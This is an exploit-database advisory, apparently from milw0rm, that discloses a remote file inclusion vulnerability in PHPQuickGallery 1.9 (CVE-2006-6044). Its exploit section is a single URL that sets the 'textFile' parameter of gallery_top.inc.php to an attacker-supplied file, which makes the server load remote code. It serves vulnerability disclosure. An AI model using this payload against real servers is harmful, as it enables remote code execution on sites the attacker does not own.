PHPQuickGallery 1.9 - 'textFile' Remote File Inclusion

Author: Al7ejaz Hacker
type: webapps
platform: php
port: 
date_added: 2006-11-18  
date_updated:   
verified: 1  
codes: OSVDB-30501;CVE-2006-6044  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 2814.txt  
============================================================================
+                                                                          =
+                     PhpQuickGallery  Remot File Include
+                                                                          =
+
+===========================================================================
+
+
+
+Script: phpquickgallery
+
+RisQe : Dangeureuse
+
+Type: Remot File Include
+
+File Infected : gallery_top.inc.php
+
+Credit By: Al7ejaz Hacker
+
+E-mail: saudi@hotmail.fr
+============================================================================
+
+
++++++++++++
+Exploit : +
++++++++++++
+
+http://localhost/phpquickgallery/gallery_top.inc.php?textFile=Attacker
+
+
+
+Discoverd By Al7ejaz Hacker
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2006-11-19]